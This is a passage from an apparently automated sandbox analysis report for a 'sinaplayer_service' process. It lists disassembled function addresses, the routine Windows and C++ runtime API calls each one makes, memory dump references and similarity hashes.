                                                                                                                                                                                                    • ?UTF8ToUTF16@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 00385DA8
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000000,?,00000000,?,00000000,00000000), ref: 00385DD3
                                                                                                                                                                                                    • malloc.MSVCR120 ref: 00385DE6
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00385DF6
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00385E10
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@BasicCloseCreateD@2@@std@@@1@@D@std@@F16@base@@FileHandlePiece@StringU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@malloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 996717932-0
                                                                                                                                                                                                    • Opcode ID: d3219aa99a814c29b924ba0c539192e9b0213413fe3dc82f848ea6812e92a02f
                                                                                                                                                                                                    • Instruction ID: 6bd06e35aa0474e6e2cdd1a33090bd2287f854fa6fcb857e234a9743f2339e1b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3219aa99a814c29b924ba0c539192e9b0213413fe3dc82f848ea6812e92a02f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6831C272D00B089BDF13AF98CC887EEBBB9BB48311F2541AADC0567250D7359909CBA1
                                                                                                                                                                                                    Function 0037D640 Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?,8285FFAB), ref: 0037D687
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120(8285FFAB), ref: 0037D698
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(?,?,8285FFAB), ref: 0037D6F2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,8285FFAB), ref: 0037D702
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,8285FFAB), ref: 0037D70C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@D@std@@@std@@FilePath@base@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3461623502-0
                                                                                                                                                                                                    • Opcode ID: ab70a6577d5fe58ee4f7936b8ee12f78219321e22ce110adbf398045ff007c58
                                                                                                                                                                                                    • Instruction ID: beaffc4016aec29e6add399cafbe98a935c3a2c1a5f77f1abe26aee42796da0e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab70a6577d5fe58ee4f7936b8ee12f78219321e22ce110adbf398045ff007c58
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 073181B1900119DFCF21DF5CC881AAEBBF8EF44710F41816AE819DB295DB35E915CB91
                                                                                                                                                                                                    Function 00392540 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP120(?,?,8285FFAB,8285FFAB,?,?,00000000,0039C148,000000FF,?,0039178C,00000000,00000021,00000040,00000001,8285FFAB), ref: 00392579
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120(?,?,00391DBA), ref: 00392596
                                                                                                                                                                                                    • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP120(?), ref: 003925CC
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB,00000000,?,00000000,?,?,00000000,0039B459,000000FF,?,003925DF), ref: 00390BED
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??Bid@locale@std@@QAEIXZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C08
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C2E
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ?_Getcat@?$codecvt@DDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,0039B459,?,?,00000000,0039B459), ref: 00390C4F
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast,?,?,?,?,00000000,0039B459), ref: 00390C65
                                                                                                                                                                                                      • Part of subcall function 00390BC0: _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 00390C74
                                                                                                                                                                                                      • Part of subcall function 00390BC0: std::_Facet_Register.LIBCPMT ref: 00390C8A
                                                                                                                                                                                                      • Part of subcall function 00390BC0: ??1_Lockit@std@@QAE@XZ.MSVCP120(?,?,00000000,0039B459), ref: 00390C95
                                                                                                                                                                                                    • ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP120 ref: 003925E6
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 003925FE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@_W@std@@@std@@$Init@?$basic_streambuf@_Lockit@std@@$??0_??0bad_cast@std@@??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@_Bid@locale@std@@ExceptionFacet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@std::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2308386547-0
                                                                                                                                                                                                    • Opcode ID: 9abd31466f2e8a28473ee3dadb0660377f7806ae31969bc95d82d929a0f93932
                                                                                                                                                                                                    • Instruction ID: 37703a8be9e7c1c1bc6adcb923b37aca61ecbbf69a3d094914f3a6efe6c7eba9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9abd31466f2e8a28473ee3dadb0660377f7806ae31969bc95d82d929a0f93932
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F314176604B44DFCB25CF69D804B9ABBF8FB49710F00462EE856C7B90D776A904CB50
                                                                                                                                                                                                    Function 6C56AFF1 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000002,00000000,?,?,?,6C56BF6E,00000000), ref: 6C56B06A
                                                                                                                                                                                                    • memmove.MSVCR120(00000001,00000002,00000001,00000002,00000000,?,?,?,6C56BF6E,00000000), ref: 6C56B073
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6C56BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6C5A3F50
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,6C56BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6C5A3F5A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6C56BF6E,00000000), ref: 6C5A3F66
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfomemmovestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4167440682-0
                                                                                                                                                                                                    • Opcode ID: af6727cf59f20b271ab767bf85387911a2095cfeb52e4ea39ca4c13e1f283f11
                                                                                                                                                                                                    • Instruction ID: 10cbb46466cd47d10733ef28dc0aea40869fb60faacc7c3bbf58fdf36b4107cc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af6727cf59f20b271ab767bf85387911a2095cfeb52e4ea39ca4c13e1f283f11
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A2137302492969EF7029A7B8C5079ABB989F46318F04456AE8958BE21E378C846C761
                                                                                                                                                                                                    Function 0038D880 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP120(00000000,00000000,?,8285FFAB,?,?,?,0039C148,000000FF,?,0038A47F,?,?,00000000), ref: 0038D8B9
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 0038D8D6
                                                                                                                                                                                                    • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP120(?), ref: 0038D8F4
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,8285FFAB), ref: 0038A2DD
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??Bid@locale@std@@QAEIXZ.MSVCP120 ref: 0038A2F8
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120 ref: 0038A31E
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ?_Getcat@?$codecvt@_WDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?), ref: 0038A33F
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast), ref: 0038A355
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: _CxxThrowException.MSVCR120(003A5F18,003A5F18), ref: 0038A364
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: std::_Facet_Register.LIBCPMT ref: 0038A37A
                                                                                                                                                                                                      • Part of subcall function 0038A2B0: ??1_Lockit@std@@QAE@XZ.MSVCP120 ref: 0038A385
                                                                                                                                                                                                    • ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP120 ref: 0038D90E
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 0038D926
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@_W@std@@@std@@$Init@?$basic_streambuf@_Lockit@std@@$??0_??0bad_cast@std@@??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@_Bid@locale@std@@ExceptionFacet_Fiopen@std@@Getcat@?$codecvt@_Getgloballocale@locale@std@@H@std@@Locimp@12@RegisterThrowU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@std::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 728936404-0
                                                                                                                                                                                                    • Opcode ID: 394a41f1880b293beaf7cdeb96ff2f523ccaedc8d15aec006f53db9fc867b1d4
                                                                                                                                                                                                    • Instruction ID: 3ec571e65e8b643225eff221ef4c8574f6da94db33f8d506a5ddeed4fb39f9e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 394a41f1880b293beaf7cdeb96ff2f523ccaedc8d15aec006f53db9fc867b1d4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8831A076604744DFDB22DF68D844B6ABBF9FB49720F00466EE816C7790DB76A800CB50
                                                                                                                                                                                                    Function 0038E9C0 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,0038F390,?,000000FF,00000014), ref: 0038EA04
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,0038F370,?,000000FF,00000008), ref: 0038EA2C
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0038EA40
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0038EA58
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 0038EA80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$LeaveObjectRegisterSingleWait$Enter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 751849837-0
                                                                                                                                                                                                    • Opcode ID: 18bad21fdcc8e02e32941647fdb88321a64e0010237ccaf0b23e640b1c4f44f2
                                                                                                                                                                                                    • Instruction ID: f56db85fc2a02350af309f0555ac387e33fb1dc2ca73dfbd0ae77cfc79faf4b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18bad21fdcc8e02e32941647fdb88321a64e0010237ccaf0b23e640b1c4f44f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2021AE72904609EFCB12DFA5DD05BDABBB8FB09720F10426AE921A3690D775A504CBA4
                                                                                                                                                                                                    Function 00387DE0 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000018,8285FFAB,?,?,0039B128,000000FF,?,0038886B,?,00000000,?,?,?,?,?,8285FFAB), ref: 00387E09
                                                                                                                                                                                                    • ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038886B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387E84
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387E99
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B,?), ref: 00387EA2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038886B), ref: 00387EA7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@CallbackTask$??2@??3@Callback@$$Location@tracked_objects@@PostReply@Runner@base@@Z@2@1@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2865833006-0
                                                                                                                                                                                                    • Opcode ID: f50d05ea3ab48fa4232954d9546ae7ece6f9a2f1789412d9bbb60b13bc1b7de3
                                                                                                                                                                                                    • Instruction ID: b892e2506186d661ad660baabd237386bee04f1c3d3f2713b93d6a25d0e7f68a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f50d05ea3ab48fa4232954d9546ae7ece6f9a2f1789412d9bbb60b13bc1b7de3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC2192B1C04249AFDF02EFA4CD05BEEBBBDEB05314F204196E814A7281E7759A04CBA1
                                                                                                                                                                                                    Function 00387D00 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                    • ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@CallbackTask$??2@??3@Callback@$$Location@tracked_objects@@PostReply@Runner@base@@Z@2@1@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2865833006-0
                                                                                                                                                                                                    • Opcode ID: 872d002584a1b13b7fff152c123a89c3914299750b41075be98e76047ee6b695
                                                                                                                                                                                                    • Instruction ID: c09eba5ca7db0dfb56f03cf04218c9cf4cd5dde7e3491ae8809b2ae0a6119d96
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 872d002584a1b13b7fff152c123a89c3914299750b41075be98e76047ee6b695
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C221A4B1C08249EFDF02DFA4CD45BEEBBBCEB15304F204096E815A7281E7759A04CBA1
                                                                                                                                                                                                    Function 00392840 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00392848
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0039285C
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0039286D
                                                                                                                                                                                                    • ungetc.MSVCR120 ref: 003928AB
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003928BE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?gptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@$ungetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3218286629-0
                                                                                                                                                                                                    • Opcode ID: 7148d11f8377455277c9eb561878720a0bc504f81a61573e241aef5c7b6313ce
                                                                                                                                                                                                    • Instruction ID: 885048d2268165e399d31cbe05e7fa6abfa4a78b24b28ae6358ca8bc3e1cd39d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7148d11f8377455277c9eb561878720a0bc504f81a61573e241aef5c7b6313ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11BF72308911AFCE269B3DAC8456AB3A9EF913357140727E561C71E0D722EC59C7A0
                                                                                                                                                                                                    Function 6C5C89F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C5C89FA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6C5C8A0C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6C62D0DC,00000014), ref: 6C5C8A21
                                                                                                                                                                                                      • Part of subcall function 6C5692EB: RaiseException.KERNEL32(?,?,?,6C57C7FC,?,?,?,?,?,6C5ADA6A,?,6C57C7FC,?,00000001), ref: 6C569333
                                                                                                                                                                                                      • Part of subcall function 6C5C887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6C5C8AB2,?,?,?,00000014), ref: 6C5C8895
                                                                                                                                                                                                      • Part of subcall function 6C573AF4: TlsGetValue.KERNEL32(6C573DF7,00000000,00000000,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C573AFA
                                                                                                                                                                                                      • Part of subcall function 6C5B9E5E: Concurrency::location::operator==.LIBCMT ref: 6C5B9E8E
                                                                                                                                                                                                      • Part of subcall function 6C5B9E5E: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6C5B9EDA
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6C5C8A5A
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6C5C8A94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
